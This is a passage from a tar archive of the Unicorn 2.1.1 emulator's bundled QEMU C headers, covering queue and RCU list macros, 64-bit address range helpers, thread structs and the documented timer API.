QLIST_RAW_NEXT(elm, entry) \ field_at_offset(elm, entry, void *) #define QLIST_RAW_PREVIOUS(elm, entry) \ field_at_offset(elm, entry + sizeof(void *), void *) #define QLIST_RAW_FOREACH(elm, head, entry) \ for ((elm) = *QLIST_RAW_FIRST(head); \ (elm); \ (elm) = *QLIST_RAW_NEXT(elm, entry)) #define QLIST_RAW_INSERT_AFTER(head, prev, elem, entry) do { \ *QLIST_RAW_NEXT(prev, entry) = elem; \ *QLIST_RAW_PREVIOUS(elem, entry) = QLIST_RAW_NEXT(prev, entry); \ *QLIST_RAW_NEXT(elem, entry) = NULL; \ } while (0) #define QLIST_RAW_INSERT_HEAD(head, elm, entry) do { \ void *first = *QLIST_RAW_FIRST(head); \ *QLIST_RAW_FIRST(head) = elm; \ *QLIST_RAW_PREVIOUS(elm, entry) = QLIST_RAW_FIRST(head); \ if (first) { \ *QLIST_RAW_NEXT(elm, entry) = first; \ *QLIST_RAW_PREVIOUS(first, entry) = QLIST_RAW_NEXT(elm, entry); \ } else { \ *QLIST_RAW_NEXT(elm, entry) = NULL; \ } \ } while (0) #endif /* QEMU_SYS_QUEUE_H */ 
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/range.h�������������������������������������������������������������0000664�0000000�0000000�00000014000�14675241067�0020005�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU 64-bit address ranges * * Copyright (c) 2015-2016 Red Hat, Inc. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #ifndef QEMU_RANGE_H #define QEMU_RANGE_H /* * Operations on 64 bit address ranges. * Notes: * - Ranges must not wrap around 0, but can include UINT64_MAX. */ struct Range { /* * Do not access members directly, use the functions! * A non-empty range has @lob <= @upb. * An empty range has @lob == @upb + 1. */ uint64_t lob; /* inclusive lower bound */ uint64_t upb; /* inclusive upper bound */ }; static inline void range_invariant(const Range *range) { assert(range->lob <= range->upb || range->lob == range->upb + 1); } /* Compound literal encoding the empty range */ #define range_empty ((Range){ .lob = 1, .upb = 0 }) /* Is @range empty? */ static inline bool range_is_empty(const Range *range) { range_invariant(range); return range->lob > range->upb; } /* Does @range contain @val? */ static inline bool range_contains(const Range *range, uint64_t val) { return val >= range->lob && val <= range->upb; } /* Initialize @range to the empty range */ static inline void range_make_empty(Range *range) { *range = range_empty; assert(range_is_empty(range)); } /* * Initialize @range to span the interval [@lob,@upb]. * Both bounds are inclusive. * The interval must not be empty, i.e. @lob must be less than or * equal @upb. */ static inline void range_set_bounds(Range *range, uint64_t lob, uint64_t upb) { range->lob = lob; range->upb = upb; assert(!range_is_empty(range)); } /* * Initialize @range to span the interval [@lob,@upb_plus1). * The lower bound is inclusive, the upper bound is exclusive. * Zero @upb_plus1 is special: if @lob is also zero, set @range to the * empty range. Else, set @range to [@lob,UINT64_MAX]. */ static inline void range_set_bounds1(Range *range, uint64_t lob, uint64_t upb_plus1) { if (!lob && !upb_plus1) { *range = range_empty; } else { range->lob = lob; range->upb = upb_plus1 - 1; } range_invariant(range); } /* Return @range's lower bound. @range must not be empty. */ static inline uint64_t range_lob(Range *range) { assert(!range_is_empty(range)); return range->lob; } /* Return @range's upper bound. 
@range must not be empty. */ static inline uint64_t range_upb(Range *range) { assert(!range_is_empty(range)); return range->upb; } /* * Initialize @range to span the interval [@lob,@lob + @size - 1]. * @size may be 0. If the range would overflow, returns -ERANGE, otherwise * 0. */ static inline int QEMU_WARN_UNUSED_RESULT range_init(Range *range, uint64_t lob, uint64_t size) { if (lob + size < lob) { return -ERANGE; } range->lob = lob; range->upb = lob + size - 1; range_invariant(range); return 0; } /* * Initialize @range to span the interval [@lob,@lob + @size - 1]. * @size may be 0. Range must not overflow. */ static inline void range_init_nofail(Range *range, uint64_t lob, uint64_t size) { range->lob = lob; range->upb = lob + size - 1; range_invariant(range); } /* * Get the size of @range. */ static inline uint64_t range_size(const Range *range) { return range->upb - range->lob + 1; } /* * Check if @range1 overlaps with @range2. If one of the ranges is empty, * the result is always "false". */ static inline bool range_overlaps_range(const Range *range1, const Range *range2) { if (range_is_empty(range1) || range_is_empty(range2)) { return false; } return !(range2->upb < range1->lob || range1->upb < range2->lob); } /* * Check if @range1 contains @range2. If one of the ranges is empty, * the result is always "false". */ static inline bool range_contains_range(const Range *range1, const Range *range2) { if (range_is_empty(range1) || range_is_empty(range2)) { return false; } return range1->lob <= range2->lob && range1->upb >= range2->upb; } /* * Extend @range to the smallest interval that includes @extend_by, too. */ static inline void range_extend(Range *range, Range *extend_by) { if (range_is_empty(extend_by)) { return; } if (range_is_empty(range)) { *range = *extend_by; return; } if (range->lob > extend_by->lob) { range->lob = extend_by->lob; } if (range->upb < extend_by->upb) { range->upb = extend_by->upb; } range_invariant(range); } /* Get last byte of a range from offset + length. * Undefined for ranges that wrap around 0. */ static inline uint64_t range_get_last(uint64_t offset, uint64_t len) { return offset + len - 1; } /* Check whether a given range covers a given byte. */ static inline int range_covers_byte(uint64_t offset, uint64_t len, uint64_t byte) { return offset <= byte && byte <= range_get_last(offset, len); } /* Check whether 2 given ranges overlap. * Undefined if ranges that wrap around 0. */ static inline int ranges_overlap(uint64_t first1, uint64_t len1, uint64_t first2, uint64_t len2) { uint64_t last1 = range_get_last(first1, len1); uint64_t last2 = range_get_last(first2, len2); return !(last2 < first1 || last1 < first2); } GList *range_list_insert(GList *list, Range *data); #endif unicorn-2.1.1/qemu/include/qemu/rcu_queue.h���������������������������������������������������������0000664�0000000�0000000�00000030603�14675241067�0020715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_RCU_QUEUE_H #define QEMU_RCU_QUEUE_H /* * rcu_queue.h * * RCU-friendly versions of the queue.h primitives. 
* * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * * Copyright (c) 2013 Mike D. Day, IBM Corporation. * * IBM's contributions to this file may be relicensed under LGPLv2 or later. */ #include "qemu/queue.h" #include "qemu/atomic.h" #ifdef __cplusplus extern "C" { #endif /* * List access methods. */ #define QLIST_EMPTY_RCU(head) (atomic_read(&(head)->lh_first) == NULL) #define QLIST_FIRST_RCU(head) (atomic_rcu_read(&(head)->lh_first)) #define QLIST_NEXT_RCU(elm, field) (atomic_rcu_read(&(elm)->field.le_next)) /* * List functions. */ /* * The difference between atomic_read/set and atomic_rcu_read/set * is in the including of a read/write memory barrier to the volatile * access. atomic_rcu_* macros include the memory barrier, the * plain atomic macros do not. Therefore, it should be correct to * issue a series of reads or writes to the same element using only * the atomic_* macro, until the last read or write, which should be * atomic_rcu_* to introduce a read or write memory barrier as * appropriate. */ /* Upon publication of the listelm->next value, list readers * will see the new node when following next pointers from * antecedent nodes, but may not see the new node when following * prev pointers from subsequent nodes until after the RCU grace * period expires. * see linux/include/rculist.h __list_add_rcu(new, prev, next) */ #define QLIST_INSERT_AFTER_RCU(listelm, elm, field) do { \ (elm)->field.le_next = (listelm)->field.le_next; \ (elm)->field.le_prev = &(listelm)->field.le_next; \ atomic_rcu_set(&(listelm)->field.le_next, (elm)); \ if ((elm)->field.le_next != NULL) { \ (elm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ } \ } while (/*CONSTCOND*/0) /* Upon publication of the listelm->prev->next value, list * readers will see the new element when following prev pointers * from subsequent elements, but may not see the new element * when following next pointers from antecedent elements * until after the RCU grace period expires. */ #define QLIST_INSERT_BEFORE_RCU(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ atomic_rcu_set((listelm)->field.le_prev, (elm)); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (/*CONSTCOND*/0) /* Upon publication of the head->first value, list readers * will see the new element when following the head, but may * not see the new element when following prev pointers from * subsequent elements until after the RCU grace period has * expired. 
*/ #define QLIST_INSERT_HEAD_RCU(head, elm, field) do { \ (elm)->field.le_prev = &(head)->lh_first; \ (elm)->field.le_next = (head)->lh_first; \ atomic_rcu_set((&(head)->lh_first), (elm)); \ if ((elm)->field.le_next != NULL) { \ (elm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ } \ } while (/*CONSTCOND*/0) /* prior to publication of the elm->prev->next value, some list * readers may still see the removed element when following * the antecedent's next pointer. */ #define QLIST_REMOVE_RCU(elm, field) do { \ if ((elm)->field.le_next != NULL) { \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ } \ atomic_set((elm)->field.le_prev, (elm)->field.le_next); \ } while (/*CONSTCOND*/0) /* List traversal must occur within an RCU critical section. */ #define QLIST_FOREACH_RCU(var, head, field) \ for ((var) = atomic_rcu_read(&(head)->lh_first); \ (var); \ (var) = atomic_rcu_read(&(var)->field.le_next)) /* List traversal must occur within an RCU critical section. */ #define QLIST_FOREACH_SAFE_RCU(var, head, field, next_var) \ for ((var) = (atomic_rcu_read(&(head)->lh_first)); \ (var) && \ ((next_var) = atomic_rcu_read(&(var)->field.le_next), 1); \ (var) = (next_var)) /* * RCU simple queue */ /* Simple queue access methods */ #define QSIMPLEQ_EMPTY_RCU(head) (atomic_read(&(head)->sqh_first) == NULL) #define QSIMPLEQ_FIRST_RCU(head) atomic_rcu_read(&(head)->sqh_first) #define QSIMPLEQ_NEXT_RCU(elm, field) atomic_rcu_read(&(elm)->field.sqe_next) /* Simple queue functions */ #define QSIMPLEQ_INSERT_HEAD_RCU(head, elm, field) do { \ (elm)->field.sqe_next = (head)->sqh_first; \ if ((elm)->field.sqe_next == NULL) { \ (head)->sqh_last = &(elm)->field.sqe_next; \ } \ atomic_rcu_set(&(head)->sqh_first, (elm)); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_TAIL_RCU(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ atomic_rcu_set((head)->sqh_last, (elm)); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_AFTER_RCU(head, listelm, elm, field) do { \ (elm)->field.sqe_next = (listelm)->field.sqe_next; \ if ((elm)->field.sqe_next == NULL) { \ (head)->sqh_last = &(elm)->field.sqe_next; \ } \ atomic_rcu_set(&(listelm)->field.sqe_next, (elm)); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE_HEAD_RCU(head, field) do { \ atomic_set(&(head)->sqh_first, (head)->sqh_first->field.sqe_next); \ if ((head)->sqh_first == NULL) { \ (head)->sqh_last = &(head)->sqh_first; \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE_RCU(head, elm, type, field) do { \ if ((head)->sqh_first == (elm)) { \ QSIMPLEQ_REMOVE_HEAD_RCU((head), field); \ } else { \ struct type *curr = (head)->sqh_first; \ while (curr->field.sqe_next != (elm)) { \ curr = curr->field.sqe_next; \ } \ atomic_set(&curr->field.sqe_next, \ curr->field.sqe_next->field.sqe_next); \ if (curr->field.sqe_next == NULL) { \ (head)->sqh_last = &(curr)->field.sqe_next; \ } \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_FOREACH_RCU(var, head, field) \ for ((var) = atomic_rcu_read(&(head)->sqh_first); \ (var); \ (var) = atomic_rcu_read(&(var)->field.sqe_next)) #define QSIMPLEQ_FOREACH_SAFE_RCU(var, head, field, next) \ for ((var) = atomic_rcu_read(&(head)->sqh_first); \ (var) && ((next) = atomic_rcu_read(&(var)->field.sqe_next), 1); \ (var) = (next)) /* * RCU tail queue */ /* Tail queue access methods */ #define QTAILQ_EMPTY_RCU(head) (atomic_read(&(head)->tqh_first) == NULL) #define QTAILQ_FIRST_RCU(head) atomic_rcu_read(&(head)->tqh_first) #define QTAILQ_NEXT_RCU(elm, field) 
atomic_rcu_read(&(elm)->field.tqe_next) /* Tail queue functions */ #define QTAILQ_INSERT_HEAD_RCU(head, elm, field) do { \ (elm)->field.tqe_next = (head)->tqh_first; \ if ((elm)->field.tqe_next != NULL) { \ (head)->tqh_first->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ } else { \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } \ atomic_rcu_set(&(head)->tqh_first, (elm)); \ (elm)->field.tqe_circ.tql_prev = &(head)->tqh_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_TAIL_RCU(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_circ.tql_prev = (head)->tqh_circ.tql_prev; \ atomic_rcu_set(&(head)->tqh_circ.tql_prev->tql_next, (elm)); \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_AFTER_RCU(head, listelm, elm, field) do { \ (elm)->field.tqe_next = (listelm)->field.tqe_next; \ if ((elm)->field.tqe_next != NULL) { \ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ } else { \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } \ atomic_rcu_set(&(listelm)->field.tqe_next, (elm)); \ (elm)->field.tqe_circ.tql_prev = &(listelm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_BEFORE_RCU(listelm, elm, field) do { \ (elm)->field.tqe_circ.tql_prev = (listelm)->field.tqe_circ.tql_prev; \ (elm)->field.tqe_next = (listelm); \ atomic_rcu_set(&(listelm)->field.tqe_circ.tql_prev->tql_next, (elm)); \ (listelm)->field.tqe_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_REMOVE_RCU(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) { \ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ (elm)->field.tqe_circ.tql_prev; \ } else { \ (head)->tqh_circ.tql_prev = (elm)->field.tqe_circ.tql_prev; \ } \ atomic_set(&(elm)->field.tqe_circ.tql_prev->tql_next, (elm)->field.tqe_next); \ (elm)->field.tqe_circ.tql_prev = NULL; \ } while (/*CONSTCOND*/0) #define QTAILQ_FOREACH_RCU(var, head, field) \ for ((var) = atomic_rcu_read(&(head)->tqh_first); \ (var); \ (var) = atomic_rcu_read(&(var)->field.tqe_next)) #define QTAILQ_FOREACH_SAFE_RCU(var, head, field, next) \ for ((var) = atomic_rcu_read(&(head)->tqh_first); \ (var) && ((next) = atomic_rcu_read(&(var)->field.tqe_next), 1); \ (var) = (next)) #ifdef __cplusplus } #endif #endif /* QEMU_RCU_QUEUE_H */ �����������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/thread-posix.h������������������������������������������������������0000664�0000000�0000000�00000000233�14675241067�0021323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_THREAD_POSIX_H #define QEMU_THREAD_POSIX_H #include <pthread.h> #include <semaphore.h> struct QemuThread { pthread_t thread; }; #endif 
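/*
 * [Editor's sketch, not part of the original archive] A minimal
 * reader/writer pair for the RCU list macros defined above.
 * rcu_read_lock()/rcu_read_unlock() are assumed to come from qemu/rcu.h;
 * the Node struct and its fields are illustrative. QLIST_ENTRY,
 * QLIST_HEAD and QLIST_HEAD_INITIALIZER are the plain queue.h primitives.
 */
typedef struct Node {
    int value;
    QLIST_ENTRY(Node) link;
} Node;

static QLIST_HEAD(, Node) nodes = QLIST_HEAD_INITIALIZER(nodes);

/* Writer: the atomic_rcu_set() inside the macro publishes the fully
 * initialised node with a write barrier, so readers never observe a
 * half-constructed element. */
static void node_add(Node *n)
{
    QLIST_INSERT_HEAD_RCU(&nodes, n, link);
}

/* Reader: each le_next is loaded with atomic_rcu_read(), so traversal is
 * safe against concurrent insertion; the read-side critical section only
 * guarantees that concurrently removed nodes are not reclaimed under our
 * feet (freeing must be deferred until a grace period has elapsed). */
static int node_sum(void)
{
    Node *n;
    int sum = 0;

    rcu_read_lock();
    QLIST_FOREACH_RCU(n, &nodes, link) {
        sum += n->value;
    }
    rcu_read_unlock();
    return sum;
}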
unicorn-2.1.1/qemu/include/qemu/thread-win32.h

#ifndef QEMU_THREAD_WIN32_H
#define QEMU_THREAD_WIN32_H

#include <windows.h>

typedef struct QemuThreadData QemuThreadData;
struct QemuThread {
    QemuThreadData *data;
    unsigned tid;
};

/* Only valid for joinable threads. */
HANDLE qemu_thread_get_handle(struct QemuThread *thread);

#endif

unicorn-2.1.1/qemu/include/qemu/thread.h

#ifndef QEMU_THREAD_H
#define QEMU_THREAD_H

#include "unicorn/platform.h"
#include "qemu/processor.h"

struct uc_struct;

typedef struct QemuThread QemuThread;

#if defined(_WIN32) && !defined(__MINGW32__)
#include "qemu/thread-win32.h"
#else
#include "qemu/thread-posix.h"
#endif

#define QEMU_THREAD_JOINABLE 0
#define QEMU_THREAD_DETACHED 1

int qemu_thread_create(struct uc_struct *uc, QemuThread *thread,
                       const char *name, void *(*start_routine)(void *),
                       void *arg, int mode);
void *qemu_thread_join(QemuThread *thread);
void qemu_thread_exit(struct uc_struct *uc, void *retval);

#endif

unicorn-2.1.1/qemu/include/qemu/timer.h

#ifndef QEMU_TIMER_H
#define QEMU_TIMER_H

#include "qemu/bitops.h"
#include "qemu/host-utils.h"

#define NANOSECONDS_PER_SECOND 1000000000LL

/* timers */

#define SCALE_MS 1000000
#define
SCALE_US 1000 #define SCALE_NS 1 /** * QEMUClockType: * * The following clock types are available: * * @QEMU_CLOCK_REALTIME: Real time clock * * The real time clock should be used only for stuff which does not * change the virtual machine state, as it runs even if the virtual * machine is stopped. * * @QEMU_CLOCK_VIRTUAL: virtual clock * * The virtual clock only runs during the emulation. It stops * when the virtual machine is stopped. * * @QEMU_CLOCK_HOST: host clock * * The host clock should be used for device models that emulate accurate * real time sources. It will continue to run when the virtual machine * is suspended, and it will reflect system time changes the host may * undergo (e.g. due to NTP). * * @QEMU_CLOCK_VIRTUAL_RT: realtime clock used for icount warp * * Outside icount mode, this clock is the same as @QEMU_CLOCK_VIRTUAL. * In icount mode, this clock counts nanoseconds while the virtual * machine is running. It is used to increase @QEMU_CLOCK_VIRTUAL * while the CPUs are sleeping and thus not executing instructions. */ typedef enum { QEMU_CLOCK_REALTIME = 0, QEMU_CLOCK_VIRTUAL = 1, QEMU_CLOCK_HOST = 2, QEMU_CLOCK_VIRTUAL_RT = 3, QEMU_CLOCK_MAX } QEMUClockType; /** * QEMU Timer attributes: * * An individual timer may be given one or multiple attributes when initialized. * Each attribute corresponds to one bit. Attributes modify the processing * of timers when they fire. * * The following attributes are available: * * QEMU_TIMER_ATTR_EXTERNAL: drives external subsystem * QEMU_TIMER_ATTR_ALL: mask for all existing attributes * * Timers with this attribute do not recorded in rr mode, therefore it could be * used for the subsystems that operate outside the guest core. Applicable only * with virtual clock type. */ #define QEMU_TIMER_ATTR_EXTERNAL ((int)BIT(0)) #define QEMU_TIMER_ATTR_ALL 0xffffffff typedef struct QEMUTimerList QEMUTimerList; struct QEMUTimerListGroup { QEMUTimerList *tl[QEMU_CLOCK_MAX]; }; typedef void QEMUTimerCB(void *opaque); typedef void QEMUTimerListNotifyCB(void *opaque, QEMUClockType type); struct QEMUTimer { int64_t expire_time; /* in nanoseconds */ QEMUTimerList *timer_list; QEMUTimerCB *cb; void *opaque; QEMUTimer *next; int attributes; int scale; }; /* * qemu_clock_get_ns; * @type: the clock type * * Get the nanosecond value of a clock with * type @type * * Returns: the clock value in nanoseconds */ int64_t qemu_clock_get_ns(QEMUClockType type); /** * qemu_clock_get_ms; * @type: the clock type * * Get the millisecond value of a clock with * type @type * * Returns: the clock value in milliseconds */ static inline int64_t qemu_clock_get_ms(QEMUClockType type) { return qemu_clock_get_ns(type) / SCALE_MS; } /** * qemu_clock_get_us; * @type: the clock type * * Get the microsecond value of a clock with * type @type * * Returns: the clock value in microseconds */ static inline int64_t qemu_clock_get_us(QEMUClockType type) { return qemu_clock_get_ns(type) / SCALE_US; } /** * qemu_clock_has_timers: * @type: the clock type * * Determines whether a clock's default timer list * has timers attached * * Note that this function should not be used when other threads also access * the timer list. The return value may be outdated by the time it is acted * upon. * * Returns: true if the clock's default timer list * has timers attached */ bool qemu_clock_has_timers(QEMUClockType type); /** * qemu_clock_expired: * @type: the clock type * * Determines whether a clock's default timer list * has an expired timer. 
 *
 * Returns: true if the clock's default timer list has
 * an expired timer
 */
bool qemu_clock_expired(QEMUClockType type);

/**
 * qemu_clock_use_for_deadline:
 * @type: the clock type
 *
 * Determine whether a clock should be used for deadline
 * calculations. Some clocks, for instance vm_clock with
 * use_icount set, do not count in nanoseconds. Such clocks
 * are not used for deadline calculations, and are presumed
 * to interrupt any poll using qemu_notify/aio_notify
 * etc.
 *
 * Returns: true if the clock runs in nanoseconds and
 * should be used for a deadline.
 */
bool qemu_clock_use_for_deadline(QEMUClockType type);

/**
 * qemu_clock_deadline_ns_all:
 * @type: the clock type
 * @attr_mask: mask for the timer attributes that are included
 *             in deadline calculation
 *
 * Calculate the deadline across all timer lists associated
 * with a clock (as opposed to just the default one)
 * in nanoseconds, or -1 if no timer is set to expire.
 *
 * Returns: time until expiry in nanoseconds or -1
 */
int64_t qemu_clock_deadline_ns_all(QEMUClockType type, int attr_mask);

/**
 * qemu_clock_get_main_loop_timerlist:
 * @type: the clock type
 *
 * Return the default timer list associated with a clock.
 *
 * Returns: the default timer list
 */
QEMUTimerList *qemu_clock_get_main_loop_timerlist(QEMUClockType type);

/**
 * qemu_clock_notify:
 * @type: the clock type
 *
 * Call the notifier callback connected with the default timer
 * list linked to the clock, or qemu_notify() if none.
 */
void qemu_clock_notify(QEMUClockType type);

/**
 * qemu_clock_enable:
 * @type: the clock type
 * @enabled: true to enable, false to disable
 *
 * Enable or disable a clock.
 * Disabling the clock will wait for related timerlists to stop
 * executing qemu_run_timers. Thus, this function should not
 * be used from the callback of a timer that is based on @clock.
 * Doing so would cause a deadlock.
 *
 * Caller should hold BQL.
 */
void qemu_clock_enable(QEMUClockType type, bool enabled);

/**
 * qemu_start_warp_timer:
 *
 * Starts a timer for virtual clock update
 */
void qemu_start_warp_timer(void);

/**
 * qemu_clock_run_timers:
 * @type: clock on which to operate
 *
 * Run all the timers associated with the default timer list
 * of a clock.
 *
 * Returns: true if any timer ran.
 */
bool qemu_clock_run_timers(QEMUClockType type);

/**
 * qemu_clock_run_all_timers:
 *
 * Run all the timers associated with the default timer list
 * of every clock.
 *
 * Returns: true if any timer ran.
 */
bool qemu_clock_run_all_timers(void);

/*
 * QEMUTimerList
 */

/**
 * timerlist_new:
 * @type: the clock type to associate with the timerlist
 * @cb: the callback to call on notification
 * @opaque: the opaque pointer to pass to the callback
 *
 * Create a new timerlist associated with the clock of
 * type @type.
 *
 * Returns: a pointer to the QEMUTimerList created
 */
QEMUTimerList *timerlist_new(QEMUClockType type,
                             QEMUTimerListNotifyCB *cb, void *opaque);

/**
 * timerlist_free:
 * @timer_list: the timer list to free
 *
 * Frees a timer_list. It must have no active timers.
 */
void timerlist_free(QEMUTimerList *timer_list);

/**
 * timerlist_has_timers:
 * @timer_list: the timer list to operate on
 *
 * Determine whether a timer list has active timers
 *
 * Note that this function should not be used when other threads also access
 * the timer list. The return value may be outdated by the time it is acted
 * upon.
 *
 * Returns: true if the timer list has timers.
*/ bool timerlist_has_timers(QEMUTimerList *timer_list); /** * timerlist_expired: * @timer_list: the timer list to operate on * * Determine whether a timer list has any timers which * are expired. * * Returns: true if the timer list has timers which * have expired. */ bool timerlist_expired(QEMUTimerList *timer_list); /** * timerlist_deadline_ns: * @timer_list: the timer list to operate on * * Determine the deadline for a timer_list, i.e. * the number of nanoseconds until the first timer * expires. Return -1 if there are no timers. * * Returns: the number of nanoseconds until the earliest * timer expires -1 if none */ int64_t timerlist_deadline_ns(QEMUTimerList *timer_list); /** * timerlist_get_clock: * @timer_list: the timer list to operate on * * Determine the clock type associated with a timer list. * * Returns: the clock type associated with the * timer list. */ QEMUClockType timerlist_get_clock(QEMUTimerList *timer_list); /** * timerlist_run_timers: * @timer_list: the timer list to use * * Call all expired timers associated with the timer list. * * Returns: true if any timer expired */ bool timerlist_run_timers(QEMUTimerList *timer_list); /** * timerlist_notify: * @timer_list: the timer list to use * * call the notifier callback associated with the timer list. */ void timerlist_notify(QEMUTimerList *timer_list); /* * QEMUTimerListGroup */ /** * timerlistgroup_init: * @tlg: the timer list group * @cb: the callback to call when a notify is required * @opaque: the opaque pointer to be passed to the callback. * * Initialise a timer list group. This must already be * allocated in memory and zeroed. The notifier callback is * called whenever a clock in the timer list group is * reenabled or whenever a timer associated with any timer * list is modified. If @cb is specified as null, qemu_notify() * is used instead. */ void timerlistgroup_init(QEMUTimerListGroup *tlg, QEMUTimerListNotifyCB *cb, void *opaque); /** * timerlistgroup_deinit: * @tlg: the timer list group * * Deinitialise a timer list group. This must already be * initialised. Note the memory is not freed. */ void timerlistgroup_deinit(QEMUTimerListGroup *tlg); /** * timerlistgroup_run_timers: * @tlg: the timer list group * * Run the timers associated with a timer list group. * This will run timers on multiple clocks. * * Returns: true if any timer callback ran */ bool timerlistgroup_run_timers(QEMUTimerListGroup *tlg); /** * timerlistgroup_deadline_ns: * @tlg: the timer list group * * Determine the deadline of the soonest timer to * expire associated with any timer list linked to * the timer list group. Only clocks suitable for * deadline calculation are included. * * Returns: the deadline in nanoseconds or -1 if no * timers are to expire. */ int64_t timerlistgroup_deadline_ns(QEMUTimerListGroup *tlg); /* * QEMUTimer */ /** * timer_init_full: * @ts: the timer to be initialised * @timer_list_group: (optional) the timer list group to attach the timer to * @type: the clock type to use * @scale: the scale value for the timer * @attributes: 0, or one or more OR'ed QEMU_TIMER_ATTR_<id> values * @cb: the callback to be called when the timer expires * @opaque: the opaque pointer to be passed to the callback * * Initialise a timer with the given scale and attributes, * and associate it with timer list for given clock @type in @timer_list_group * (or default timer list group, if NULL). * The caller is responsible for allocating the memory. * * You need not call an explicit deinit call. Simply make * sure it is not on a list with timer_del. 
*/ void timer_init_full(QEMUTimer *ts, QEMUTimerListGroup *timer_list_group, QEMUClockType type, int scale, int attributes, QEMUTimerCB *cb, void *opaque); /** * timer_init: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @scale: the scale value for the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with the given scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init(QEMUTimer *ts, QEMUClockType type, int scale, QEMUTimerCB *cb, void *opaque) { // timer_init_full(ts, NULL, type, scale, 0, cb, opaque); } /** * timer_init_ns: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with nanosecond scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init_ns(QEMUTimer *ts, QEMUClockType type, QEMUTimerCB *cb, void *opaque) { timer_init(ts, type, SCALE_NS, cb, opaque); } /** * timer_init_us: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with microsecond scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init_us(QEMUTimer *ts, QEMUClockType type, QEMUTimerCB *cb, void *opaque) { timer_init(ts, type, SCALE_US, cb, opaque); } /** * timer_init_ms: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with millisecond scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init_ms(QEMUTimer *ts, QEMUClockType type, QEMUTimerCB *cb, void *opaque) { timer_init(ts, type, SCALE_MS, cb, opaque); } /** * timer_new_full: * @timer_list_group: (optional) the timer list group to attach the timer to * @type: the clock type to use * @scale: the scale value for the timer * @attributes: 0, or one or more OR'ed QEMU_TIMER_ATTR_<id> values * @cb: the callback to be called when the timer expires * @opaque: the opaque pointer to be passed to the callback * * Create a new timer with the given scale and attributes, * and associate it with timer list for given clock @type in @timer_list_group * (or default timer list group, if NULL). * The memory is allocated by the function. * * This is not the preferred interface unless you know you * are going to call timer_free. Use timer_init or timer_init_full instead. * * The default timer list has one special feature: in icount mode, * %QEMU_CLOCK_VIRTUAL timers are run in the vCPU thread. This is * not true of other timer lists, which are typically associated * with an AioContext---each of them runs its timer callbacks in its own * AioContext thread. 
